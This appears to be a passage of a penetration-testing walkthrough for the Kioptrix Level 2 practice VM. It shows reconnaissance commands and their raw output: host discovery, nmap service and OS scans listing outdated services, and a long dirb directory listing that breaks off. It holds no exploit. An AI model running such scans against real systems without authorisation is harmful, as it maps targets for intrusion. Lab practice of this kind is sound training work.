Security Exposed: Kioptrix Level 2

Scenario let's try this:
netdiscover -r 192.168.180.0/24
nmap -sV -T4 -O -F --version-light 192.168.180.138
nmap -sC -sS -T4 -A -v -v -Pn 192.168.180.138
nmap -sC -sU -T4 -A -v -v -Pn –top-ports 200 192.168.180.138
dirb http://192.168.180.138
wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --hc 404 http://192.168.180.138/FUZZ
nikto -h 192.168.180.138

In case there is SMB:
smbclient -N -L 192.168.180.138
enum4linux -a 192.168.180.138

netdiscover -r 192.168.180.0/24

Currently scanning: Finished! | Screen View: Unique Hosts

4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240

_____________________________________________________________________________

IP At MAC Address Count Len MAC Vendor / Hostname

-----------------------------------------------------------------------------

192.168.180.1 00:50:56:c0:00:08 1 60 VMware, Inc.

192.168.180.2 00:50:56:f9:f6:4a 1 60 VMware, Inc.

192.168.180.138 00:0c:29:04:7c:66 1 60 VMware, Inc.

192.168.180.254 00:50:56:fa:45:3e 1 60 VMware, Inc.

nmap -sV -T4 -O -F --version-light 192.168.180.138

Starting Nmap 7.01 ( https://nmap.org ) at 2016-08-09 01:49 EDT

Nmap scan report for 192.168.180.138

Host is up (0.00015s latency).

Not shown: 94 closed ports

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)

80/tcp open http Apache httpd 2.0.52 ((CentOS))

111/tcp open rpcbind

443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))

631/tcp open ipp CUPS 1.1

3306/tcp open mysql MySQL (unauthorized)

MAC Address: 00:0C:29:04:7C:66 (VMware)

Device type: general purpose

Running: Linux 2.6.X

OS CPE: cpe:/o:linux:linux_kernel:2.6

OS details: Linux 2.6.9 - 2.6.30

Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 28.46 seconds

nmap -sC -sS -T4 -A -v -v -Pn 192.168.180.138

Starting Nmap 7.01 ( https://nmap.org ) at 2016-08-09 01:50 EDT

NSE: Loaded 132 scripts for scanning.

NSE: Script Pre-scanning.

NSE: Starting runlevel 1 (of 2) scan.

Initiating NSE at 01:50

Completed NSE at 01:50, 0.00s elapsed

NSE: Starting runlevel 2 (of 2) scan.

Initiating NSE at 01:50

Completed NSE at 01:50, 0.00s elapsed

Initiating ARP Ping Scan at 01:50

Scanning 192.168.180.138 [1 port]

Completed ARP Ping Scan at 01:50, 0.02s elapsed (1 total hosts)

Initiating Parallel DNS resolution of 1 host. at 01:50

Completed Parallel DNS resolution of 1 host. at 01:50, 13.00s elapsed

Initiating SYN Stealth Scan at 01:50

Scanning 192.168.180.138 [1000 ports]

Discovered open port 80/tcp on 192.168.180.138

Discovered open port 443/tcp on 192.168.180.138

Discovered open port 3306/tcp on 192.168.180.138

Discovered open port 111/tcp on 192.168.180.138

Discovered open port 22/tcp on 192.168.180.138

Discovered open port 631/tcp on 192.168.180.138

Discovered open port 843/tcp on 192.168.180.138

Completed SYN Stealth Scan at 01:50, 0.04s elapsed (1000 total ports)

Initiating Service scan at 01:50

Scanning 7 services on 192.168.180.138

Completed Service scan at 01:51, 12.03s elapsed (7 services on 1 host)

Initiating OS detection (try #1) against 192.168.180.138

NSE: Script scanning 192.168.180.138.

NSE: Starting runlevel 1 (of 2) scan.

Initiating NSE at 01:51

Completed NSE at 01:51, 2.13s elapsed

NSE: Starting runlevel 2 (of 2) scan.

Initiating NSE at 01:51

Completed NSE at 01:51, 0.00s elapsed

Nmap scan report for 192.168.180.138

Host is up, received arp-response (0.00015s latency).

Scanned at 2016-08-09 01:50:35 EDT for 29s

Not shown: 993 closed ports

Reason: 993 resets

PORT STATE SERVICE REASON VERSION

22/tcp open ssh syn-ack ttl 64 OpenSSH 3.9p1 (protocol 1.99)

| ssh-hostkey:

| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)

| 1024 35 149174282886581624883868648302761292182406879108668063702143177994710569161669502445416601666211201346192352271911333433971833283425439634231257314174441054335295864218587993634534355128377261436615077053235666774641007412196140534221696911370388178873572900977872600139866890316021962605461192127591516843621

| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)

| ssh-dss AAAAB3NzaC1kc3MAAACBAOWJ2N2BPBPm0HxCi630ZxHtTNMh+uVkeYCkKVNxavZkcJdpfFTOGZp054sj27mVZVtCeNMHhzAUpvRisn/cH4k4plLd1m8HACAVPtcgRrshCzb7wzQikrP+byCVypE0RpkQcDya+ngDMVzrkA+9KQSR/5W6BjldLW60A5oZgyfvAAAAFQC/iRZe4LlaYXwHvYYDpjnoCPY3xQAAAIBKFGl/zr/u1JxCV8a9dIAMIE0rk0jYtwvpDCdBre450ruoLII/hsparzdJs898SMWX1kEzigzUdtobDVT8nWdJAVRHCm8ruy4IQYIdtjYowXD7hxZTy/F0xOsiTRWBYMQPe8lW1oA+xabqlnCO3ppjmBecVlCwEMoeefnwGWAkxwAAAIAKajcioQiMDYW7veV13Yjmag6wyIia9+V9aO8JmgMi3cNr04Vl0FF+n7OIZ5QYvpSKcQgRzwNylEW5juV0Xh96m2g3rqEvDd4kTttCDlOltPgP6q6Z8JI0IGzcIGYBy6UWdIxj9D7F2ccc7fAM2o22+qgFp+FFiLeFDVbRhYz4sg==

| 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)

|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA4j5XFFw9Km2yphjpu1gzDBglGSpMxtR8zOvpH9gUbOMXXbCQeXgOK3rs4cs/j75G54jALm99Ky7tgToNaEuxmQmwnpYk9bntoDu9SkiT/hPZdOwq40yrfWIHzlUNWTpY3okTdf/YNUAdl4NOBOYbf0x/dsAdHHqSWnvZmruFA6M=

|_sshv1: Server supports SSHv1

80/tcp open http syn-ack ttl 64 Apache httpd 2.0.52 ((CentOS))

| http-methods:

|_ Supported Methods: GET HEAD POST OPTIONS

|_http-server-header: Apache/2.0.52 (CentOS)

|_http-title: Site doesn't have a title (text/html; charset=UTF-8).

111/tcp open rpcbind syn-ack ttl 64 2 (RPC #100000)

| rpcinfo:

| program version port/proto service

| 100000 2 111/tcp rpcbind

| 100000 2 111/udp rpcbind

| 100024 1 840/udp status

|_ 100024 1 843/tcp status

443/tcp open ssl/http syn-ack ttl 64 Apache httpd 2.0.52 ((CentOS))

| http-methods:

|_ Supported Methods: GET HEAD POST OPTIONS

|_http-server-header: Apache/2.0.52 (CentOS)

|_http-title: Site doesn't have a title (text/html; charset=UTF-8).

| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--/localityName=SomeCity/emailAddress=root@localhost.localdomain/organizationalUnitName=SomeOrganizationalUnit

| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--/localityName=SomeCity/emailAddress=root@localhost.localdomain/organizationalUnitName=SomeOrganizationalUnit

| Public Key type: rsa

| Public Key bits: 1024

| Signature Algorithm: md5WithRSAEncryption

| Not valid before: 2009-10-08T00:10:47

| Not valid after: 2010-10-08T00:10:47

| MD5: 01de 29f9 fbfb 2eb2 beaf e624 3157 090f

| SHA-1: 560c 9196 6506 fb0f fb81 66b1 ded3 ac11 2ed4 808a

| -----BEGIN CERTIFICATE-----

| MIIEDDCCA3WgAwIBAgIBADANBgkqhkiG9w0BAQQFADCBuzELMAkGA1UEBhMCLS0x

| EjAQBgNVBAgTCVNvbWVTdGF0ZTERMA8GA1UEBxMIU29tZUNpdHkxGTAXBgNVBAoT

| EFNvbWVPcmdhbml6YXRpb24xHzAdBgNVBAsTFlNvbWVPcmdhbml6YXRpb25hbFVu

| aXQxHjAcBgNVBAMTFWxvY2FsaG9zdC5sb2NhbGRvbWFpbjEpMCcGCSqGSIb3DQEJ

| ARYacm9vdEBsb2NhbGhvc3QubG9jYWxkb21haW4wHhcNMDkxMDA4MDAxMDQ3WhcN

| MTAxMDA4MDAxMDQ3WjCBuzELMAkGA1UEBhMCLS0xEjAQBgNVBAgTCVNvbWVTdGF0

| ZTERMA8GA1UEBxMIU29tZUNpdHkxGTAXBgNVBAoTEFNvbWVPcmdhbml6YXRpb24x

| HzAdBgNVBAsTFlNvbWVPcmdhbml6YXRpb25hbFVuaXQxHjAcBgNVBAMTFWxvY2Fs

| aG9zdC5sb2NhbGRvbWFpbjEpMCcGCSqGSIb3DQEJARYacm9vdEBsb2NhbGhvc3Qu

| bG9jYWxkb21haW4wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAN4duNVEr4aL

| TUfsjacXKcCaRs1oTxsdNTIxkp7SV2PDD+mBY5shsXt/FMG7Upf4g605+W6ZEhfB

| WpLXonDFaRIxxn4AGSOLg8q20kUt9p2HZufaSLSwfSwJ+CTMwYtN8AU0jhf3r0y8

| jr+jjEU0HT4O4YXcnDRvbIUeHKedPPsTAgMBAAGjggEcMIIBGDAdBgNVHQ4EFgQU

| QAs+OwqZIYsWClQ2ZBav2uPP/mAwgegGA1UdIwSB4DCB3YAUQAs+OwqZIYsWClQ2

| ZBav2uPP/mChgcGkgb4wgbsxCzAJBgNVBAYTAi0tMRIwEAYDVQQIEwlTb21lU3Rh

| dGUxETAPBgNVBAcTCFNvbWVDaXR5MRkwFwYDVQQKExBTb21lT3JnYW5pemF0aW9u

| MR8wHQYDVQQLExZTb21lT3JnYW5pemF0aW9uYWxVbml0MR4wHAYDVQQDExVsb2Nh

| bGhvc3QubG9jYWxkb21haW4xKTAnBgkqhkiG9w0BCQEWGnJvb3RAbG9jYWxob3N0

| LmxvY2FsZG9tYWluggEAMAwGA1UdEwQFMAMBAf8wDQYJKoZIhvcNAQEEBQADgYEA

| Hvq7KPeUTn36Sz/Au95TmC7aSkhIkGVHMRGhWe7KTEflqQffYTqJOS4xsu/FxDRy

| 9IGOapsyILGEx57apuCYJW3tpwMUrpUXu/x9g3LM+VghiH0XxMOfbueVhqWZ+yP8

| LisROr5u+FeGOBBIINAmpWUX2xEdB4p97WYzP03rEQU=

|_-----END CERTIFICATE-----

|_ssl-date: 2016-08-09T02:41:19+00:00; -3h09m45s from scanner time.

| sslv2:

| SSLv2 supported

| ciphers:

| SSL2_DES_192_EDE3_CBC_WITH_MD5

| SSL2_RC2_CBC_128_CBC_WITH_MD5

| SSL2_RC4_128_WITH_MD5

| SSL2_RC4_64_WITH_MD5

| SSL2_DES_64_CBC_WITH_MD5

| SSL2_RC2_CBC_128_CBC_WITH_MD5

|_ SSL2_RC4_128_EXPORT40_WITH_MD5

631/tcp open ipp syn-ack ttl 64 CUPS 1.1

| http-methods:

| Supported Methods: GET HEAD OPTIONS POST PUT

|_ Potentially risky methods: PUT

|_http-server-header: CUPS/1.1

|_http-title: 403 Forbidden

843/tcp open status syn-ack ttl 64 1 (RPC #100024)

3306/tcp open mysql syn-ack ttl 64 MySQL (unauthorized)

MAC Address: 00:0C:29:04:7C:66 (VMware)

Device type: general purpose

Running: Linux 2.6.X

OS CPE: cpe:/o:linux:linux_kernel:2.6

OS details: Linux 2.6.9 - 2.6.30

TCP/IP fingerprint:

OS:SCAN(V=7.01%E=4%D=8/9%OT=22%CT=1%CU=38334%PV=Y%DS=1%DC=D%G=Y%M=000C29%TM

OS:=57A96F48%P=i586-pc-linux-gnu)SEQ(SP=C4%GCD=1%ISR=C6%TI=Z%CI=Z%II=I%TS=A

OS:)OPS(O1=M5B4ST11NW2%O2=M5B4ST11NW2%O3=M5B4NNT11NW2%O4=M5B4ST11NW2%O5=M5B

OS:4ST11NW2%O6=M5B4ST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0

OS:)ECN(R=Y%DF=Y%T=40%W=16D0%O=M5B4NNSNW2%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+

OS:%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M5B4ST11NW2

OS:%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=

OS:0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T

OS:7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN

OS:=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 0.003 days (since Tue Aug 9 01:47:22 2016)

Network Distance: 1 hop

TCP Sequence Prediction: Difficulty=196 (Good luck!)

IP ID Sequence Generation: All zeros

TRACEROUTE

HOP RTT ADDRESS

1 0.15 ms 192.168.180.138

NSE: Script Post-scanning.

NSE: Starting runlevel 1 (of 2) scan.

Initiating NSE at 01:51

Completed NSE at 01:51, 0.00s elapsed

NSE: Starting runlevel 2 (of 2) scan.

Initiating NSE at 01:51

Completed NSE at 01:51, 0.00s elapsed

Read data files from: /usr/bin/../share/nmap

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 29.42 seconds

Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.366KB)

nmap -sC -sU -T4 -A -v -v -Pn –top-ports 200 192.168.180.138

Starting Nmap 7.01 ( https://nmap.org ) at 2016-08-09 01:52 EDT

PORT STATE SERVICE REASON VERSION

68/udp open|filtered dhcpc no-response

111/udp open rpcbind udp-response ttl 64 2 (RPC #100000)

| rpcinfo:

| program version port/proto service

| 100000 2 111/tcp rpcbind

| 100000 2 111/udp rpcbind

| 100024 1 840/udp status

|_ 100024 1 843/tcp status

631/udp open|filtered ipp no-response

683/udp open|filtered corba-iiop no-response

1021/udp open|filtered exp1 no-response

1024/udp open|filtered unknown no-response

1054/udp open|filtered brvread no-response

6971/udp open|filtered unknown no-response

9020/udp open|filtered tambora no-response

17018/udp open|filtered unknown no-response

18228/udp open|filtered unknown no-response

19956/udp open|filtered unknown no-response

20309/udp open|filtered unknown no-response

20665/udp open|filtered unknown no-response

21298/udp open|filtered unknown no-response

22739/udp open|filtered unknown no-response

26966/udp open|filtered unknown no-response

29823/udp open|filtered unknown no-response

30303/udp open|filtered unknown no-response

32771/udp open|filtered sometimes-rpc6 no-response

47624/udp open|filtered directplaysrvr no-response

49156/udp open|filtered unknown no-response

49393/udp open|filtered unknown no-response

60423/udp open|filtered unknown no-response

MAC Address: 00:0C:29:04:7C:66 (VMware)

Too many fingerprints match this host to give specific OS details

TCP/IP fingerprint:

SCAN(V=7.01%E=4%D=8/9%OT=%CT=%CU=2%PV=Y%DS=1%DC=D%G=N%M=000C29%TM=57A97403%P=i586-pc-linux-gnu)

SEQ(CI=Z%II=I)

T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)

T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)

T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)

U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)

IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 1 hop

TRACEROUTE

HOP RTT ADDRESS

1 0.21 ms 192.168.180.138

NSE: Script Post-scanning.

NSE: Starting runlevel 1 (of 2) scan.

Initiating NSE at 02:11

Completed NSE at 02:11, 0.00s elapsed

NSE: Starting runlevel 2 (of 2) scan.

Initiating NSE at 02:11

Completed NSE at 02:11, 0.00s elapsed

Read data files from: /usr/bin/../share/nmap

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 1149.92 seconds

Raw packets sent: 1574 (46.348KB) | Rcvd: 1071 (61.672KB)

dirb http://192.168.180.138

-----------------

DIRB v2.22

By The Dark Raver

-----------------

START_TIME: Tue Aug 9 02:12:19 2016

URL_BASE: http://192.168.180.138/

WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.180.138/ ----

+ http://192.168.180.138/cgi-bin/ (CODE:403|SIZE:291)

+ http://192.168.180.138/index.php (CODE:200|SIZE:667)

==> DIRECTORY: http://192.168.180.138/manual/

+ http://192.168.180.138/usage (CODE:403|SIZE:288)

---- Entering directory: http://192.168.180.138/manual/ ----

==> DIRECTORY: http://192.168.180.138/manual/de/

==> DIRECTORY: http://192.168.180.138/manual/developer/

==> DIRECTORY: http://192.168.180.138/manual/en/

==> DIRECTORY: http://192.168.180.138/manual/faq/

==> DIRECTORY: http://192.168.180.138/manual/fr/

==> DIRECTORY: http://192.168.180.138/manual/howto/

==> DIRECTORY: http://192.168.180.138/manual/images/

+ http://192.168.180.138/manual/index.html (CODE:200|SIZE:7234)

==> DIRECTORY: http://192.168.180.138/manual/ja/

==> DIRECTORY: http://192.168.180.138/manual/ko/

+ http://192.168.180.138/manual/LICENSE (CODE:200|SIZE:11358)

==> DIRECTORY: http://192.168.180.138/manual/misc/

==> DIRECTORY: http://192.168.180.138/manual/mod/

==> DIRECTORY: http://192.168.180.138/manual/programs/

==> DIRECTORY: http://192.168.180.138/manual/ru/

==> DIRECTORY: http://192.168.180.138/manual/ssl/

==> DIRECTORY: http://192.168.180.138/manual/style/

---- Entering directory: http://192.168.180.138/manual/de/ ----

+ http://192.168.180.138/manual/de/de (CODE:301|SIZE:321)

==> DIRECTORY: http://192.168.180.138/manual/de/developer/

+ http://192.168.180.138/manual/de/en (CODE:301|SIZE:321)

==> DIRECTORY: http://192.168.180.138/manual/de/faq/

+ http://192.168.180.138/manual/de/fr (CODE:301|SIZE:321)

==> DIRECTORY: http://192.168.180.138/manual/de/howto/

==> DIRECTORY: http://192.168.180.138/manual/de/images/

+ http://192.168.180.138/manual/de/index.html (CODE:200|SIZE:7317)

+ http://192.168.180.138/manual/de/ja (CODE:301|SIZE:321)

+ http://192.168.180.138/manual/de/ko (CODE:301|SIZE:321)

+ http://192.168.180.138/manual/de/LICENSE (CODE:200|SIZE:11358)

==> DIRECTORY: http://192.168.180.138/manual/de/misc/

==> DIRECTORY: http://192.168.180.138/manual/de/mod/

==> DIRECTORY: http://192.168.180.138/manual/de/programs/

+ http://192.168.180.138/manual/de/ru (CODE:301|SIZE:321)

==> DIRECTORY: http://192.168.180.138/manual/de/ssl/

==> DIRECTORY: http://192.168.180.138/manual/de/style/

---- Entering directory: http://192.168.180.138/manual/developer/ ----

+ http://192.168.180.138/manual/developer/index.html (CODE:200|SIZE:4770)

---- Entering directory: http://192.168.180.138/manual/en/ ----

+ http://192.168.180.138/manual/en/de (CODE:301|SIZE:321)

==> DIRECTORY: http://192.168.180.138/manual/en/developer/

+ http://192.168.180.138/manual/en/en (CODE:301|SIZE:321)

==> DIRECTORY: http://192.168.180.138/manual/en/faq/

+ http://192.168.180.138/manual/en/fr (CODE:301|SIZE:321)

==> DIRECTORY: http://192.168.180.138/manual/en/howto/

==> DIRECTORY: http://192.168.180.138/manual/en/images/

+ http://192.168.180.138/manual/en/index.html (CODE:200|SIZE:7234)

+ http://192.168.180.138/manual/en/ja (CODE:301|SIZE:321)

+ http://192.168.180.138/manual/en/ko (CODE:301|SIZE:321)

+ http://192.168.180.138/manual/en/LICENSE (CODE:200|SIZE:11358)

==> DIRECTORY: http://192.168.180.138/manual/en/misc/

==> DIRECTORY: http://192.168.180.138/manual/en/mod/

==> DIRECTORY: http://192.168.180.138/manual/en/programs/

+ http://192.168.180.138/manual/en/ru (CODE:301|SIZE:321)

==> DIRECTORY: http://192.168.180.138/manual/en/ssl/

==> DIRECTORY: http://192.168.180.138/manual/en/style/

---- Entering directory: http://192.168.180.138/manual/faq/ ----

+ http://192.168.180.138/manual/faq/index.html (CODE:200|SIZE:3564)

---- Entering directory: http://192.168.180.138/manual/fr/ ----

+ http://192.168.180.138/manual/fr/de (CODE:301|SIZE:321)

==> DIRECTORY: http://192.168.180.138/manual/fr/developer/

+ http://192.168.180.138/manual/fr/en (CODE:301|SIZE:321)

==> DIRECTORY: http://192.168.180.138/manual/fr/faq/

+ http://192.168.180.138/manual/fr/fr (CODE:301|SIZE:321)

==> DIRECTORY: http://192.168.180.138/manual/fr/howto/

==> DIRECTORY: http://192.168.180.138/manual/fr/images/

+ http://192.168.180.138/manual/fr/index.html (CODE:200|SIZE:7234)

+ http://192.168.180.138/manual/fr/ja (CODE:301|SIZE:321)

+ http://192.168.180.138/manual/fr/ko (CODE:301|SIZE:321)

+ http://192.168.180.138/manual/fr/LICENSE (CODE:200|SIZE:11358)

==> DIRECTORY: http://192.168.180.138/manual/fr/misc/

==> DIRECTORY: http://192.168.180.138/manual/fr/mod/

==> DIRECTORY: http://192.168.180.138/manual/fr/programs/

+ http://192.168.180.138/manual/fr/ru (CODE:301|SIZE:321)

==> DIRECTORY: http://192.168.180.138/manual/fr/ssl/

==> DIRECTORY: http://192.168.180.138/manual/fr/style/

---- Entering directory: http://192.168.180.138/manual/howto/ ----

+ http://192.168.180.138/manual/howto/index.html (CODE:200|SIZE:5685)

---- Entering directory: http://192.168.180.138/manual/images/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.180.138/manual/ja/ ----

+ http://192.168.180.138/manual/ja/de (CODE:301|SIZE:321)

==> DIRECTORY: http://192.168.180.138/manual/ja/developer/

+ http://192.168.180.138/manual/ja/en (CODE:301|SIZE:321)

==> DIRECTORY: http://192.168.180.138/manual/ja/faq/

+ http://192.168.180.138/manual/ja/fr (CODE:301|SIZE:321)

==> DIRECTORY: http://192.168.180.138/manual/ja/howto/

==> DIRECTORY: http://192.168.180.138/manual/ja/images/

+ http://192.168.180.138/manual/ja/index.html (CODE:200|SIZE:7227)

+ http://192.168.180.138/manual/ja/ja (CODE:301|SIZE:321)

+ http://192.168.180.138/manual/ja/ko (CODE:301|SIZE:321)

+ http://192.168.180.138/manual/ja/LICENSE (CODE:200|SIZE:11358)

==> DIRECTORY: http://192.168.180.138/manual/ja/misc/

==> DIRECTORY: http://192.168.180.138/manual/ja/mod/

==> DIRECTORY: http://192.168.180.138/manual/ja/programs/

+ http://192.168.180.138/manual/ja/ru (CODE:301|SIZE:321)

==> DIRECTORY: http://192.168.180.138/manual/ja/ssl/

==> DIRECTORY: http://192.168.180.138/manual/ja/style/

---- Entering directory: http://192.168.180.138/manual/ko/ ----

+ http://192.168.180.138/manual/ko/de (CODE:301|SIZE:321)

==> DIRECTORY: http://192.168.180.138/manual/ko/developer/

+ http://192.168.180.138/manual/ko/en (CODE:301|SIZE:321)

==> DIRECTORY: http://192.168.180.138/manual/ko/faq/

+ http://192.168.180.138/manual/ko/fr (CODE:301|SIZE:321)

==> DIRECTORY: http://192.168.180.138/manual/ko/howto/

==> DIRECTORY: http://192.168.180.138/manual/ko/images/

+ http://192.168.180.138/manual/ko/index.html (CODE:200|SIZE:6954)

+ http://192.168.180.138/manual/ko/ja (CODE:301|SIZE:321)

+ http://192.168.180.138/manual/ko/ko (CODE:301|SIZE:321)

+ http://192.168.180.138/manual/ko/LICENSE (CODE:200|SIZE:11358)

==> DIRECTORY: http://192.168.180.138/manual/ko/misc/

==> DIRECTORY: http://192.168.180.138/manual/ko/mod/

==> DIRECTORY: http://192.168.180.138/manual/ko/programs/

+ http://192.168.180.138/manual/ko/ru (CODE:301|SIZE:321)

==> DIRECTORY: http://192.168.180.138/manual/ko/ssl/

==> DIRECTORY: http://192.168.180.138/manual/ko/style/

---- Entering directory: http://192.168.180.138/manual/misc/ ----

+ http://192.168.180.138/manual/misc/index.html (CODE:200|SIZE:5491)

---- Entering directory: http://192.168.180.138/manual/mod/ ----

+ http://192.168.180.138/manual/mod/index.html (CODE:200|SIZE:13437)

---- Entering directory: http://192.168.180.138/manual/programs/ ----

+ http://192.168.180.138/manual/programs/index.html (CODE:200|SIZE:4664)

---- Entering directory: http://192.168.180.138/manual/ru/ ----

+ http://192.168.180.138/manual/ru/de (CODE:301|SIZE:321)

==> DIRECTORY: http://192.168.180.138/manual/ru/developer/

+ http://192.168.180.138/manual/ru/en (CODE:301|SIZE:321)

==> DIRECTORY: http://192.168.180.138/manual/ru/faq/

+ http://192.168.180.138/manual/ru/fr (CODE:301|SIZE:321)

==> DIRECTORY: http://192.168.180.138/manual/ru/howto/

==> DIRECTORY: http://192.168.180.138/manual/ru/images/

+ http://192.168.180.138/manual/ru/index.html (CODE:200|SIZE:7277)

+ http://192.168.180.138/manual/ru/ja (CODE:301|SIZE:321)

+ http://192.168.180.138/manual/ru/ko (CODE:301|SIZE:321)

+ http://192.168.180.138/manual/ru/LICENSE (CODE:200|SIZE:11358)

==> DIRECTORY: http://192.168.180.138/manual/ru/misc/

==> DIRECTORY: http://192.168.180.138/manual/ru/mod/

==> DIRECTORY: http://192.168.180.138/manual/ru/programs/

+ http://192.168.180.138/manual/ru/ru (CODE:301|SIZE:321)

==> DIRECTORY: http://192.168.180.138/manual/ru/ssl/

==> DIRECTORY: http://192.168.180.138/manual/ru/style/

---- Entering directory: http://192.168.180.138/manual/ssl/ ----

+ http://192.168.180.138/manual/ssl/index.html (CODE:200|SIZE:3988)

---- Entering directory: http://192.168.180.138/manual/style/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.180.138/manual/de/developer/ ----

+ http://192.168.180.138/manual/de/developer/index.html (CODE:200|SIZE:4770)

---- Entering directory: http://192.168.180.138/manual/de/faq/ ----

+ http://192.168.180.138/manual/de/faq/index.html (CODE:200|SIZE:3564)

---- Entering directory: http://192.168.180.138/manual/de/howto/ ----

+ http://192.168.180.138/manual/de/howto/index.html (CODE:200|SIZE:5685)

---- Entering directory: http://192.168.180.138/manual/de/images/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.180.138/manual/de/misc/ ----

+ http://192.168.180.138/manual/de/misc/index.html (CODE:200|SIZE:5491)

---- Entering directory: http://192.168.180.138/manual/de/mod/ ----

+ http://192.168.180.138/manual/de/mod/index.html (CODE:200|SIZE:13561)

---- Entering directory: http://192.168.180.138/manual/de/programs/ ----

+ http://192.168.180.138/manual/de/programs/index.html (CODE:200|SIZE:4664)

---- Entering directory: http://192.168.180.138/manual/de/ssl/ ----

+ http://192.168.180.138/manual/de/ssl/index.html (CODE:200|SIZE:3988)

---- Entering directory: http://192.168.180.138/manual/de/style/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.180.138/manual/en/developer/ ----

+ http://192.168.180.138/manual/en/developer/index.html (CODE:200|SIZE:4770)

---- Entering directory: http://192.168.180.138/manual/en/faq/ ----

+ http://192.168.180.138/manual/en/faq/index.html (CODE:200|SIZE:3564)

---- Entering directory: http://192.168.180.138/manual/en/howto/ ----

+ http://192.168.180.138/manual/en/howto/index.html (CODE:200|SIZE:5685)

---- Entering directory: http://192.168.180.138/manual/en/images/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.180.138/manual/en/misc/ ----

+ http://192.168.180.138/manual/en/misc/index.html (CODE:200|SIZE:5491)

---- Entering directory: http://192.168.180.138/manual/en/mod/ ----

+ http://192.168.180.138/manual/en/mod/index.html (CODE:200|SIZE:13437)

---- Entering directory: http://192.168.180.138/manual/en/programs/ ----

+ http://192.168.180.138/manual/en/programs/index.html (CODE:200|SIZE:4664)

---- Entering directory: http://192.168.180.138/manual/en/ssl/ ----

+ http://192.168.180.138/manual/en/ssl/index.html (CODE:200|SIZE:3988)

---- Entering directory: http://192.168.180.138/manual/en/style/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.180.138/manual/fr/developer/ ----

+ http://192.168.180.138/manual/fr/developer/index.html (CODE:200|SIZE:4770)

---- Entering directory: http://192.168.180.138/manual/fr/faq/ ----

+ http://192.168.180.138/manual/fr/faq/index.html (CODE:200|SIZE:3564)

---- Entering directory: http://192.168.180.138/manual/fr/howto/ ----

+ http://192.168.180.138/manual/fr/howto/index.html (CODE:200|SIZE:5685)

---- Entering directory: http://192.168.180.138/manual/fr/images/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.180.138/manual/fr/misc/ ----

+ http://192.168.180.138/manual/fr/misc/index.html (CODE:200|SIZE:5491)

---- Entering directory: http://192.168.180.138/manual/fr/mod/ ----

+ http://192.168.180.138/manual/fr/mod/index.html (CODE:200|SIZE:13437)

---- Entering directory: http://192.168.180.138/manual/fr/programs/ ----

+ http://192.168.180.138/manual/fr/programs/index.html (CODE:200|SIZE:4664)

---- Entering directory: http://192.168.180.138/manual/fr/ssl/ ----

+ http://192.168.180.138/manual/fr/ssl/index.html (CODE:200|SIZE:3988)

---- Entering directory: http://192.168.180.138/manual/fr/style/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.180.138/manual/ja/developer/ ----

+ http://192.168.180.138/manual/ja/developer/index.html (CODE:200|SIZE:4770)

---- Entering directory: http://192.168.180.138/manual/ja/faq/ ----

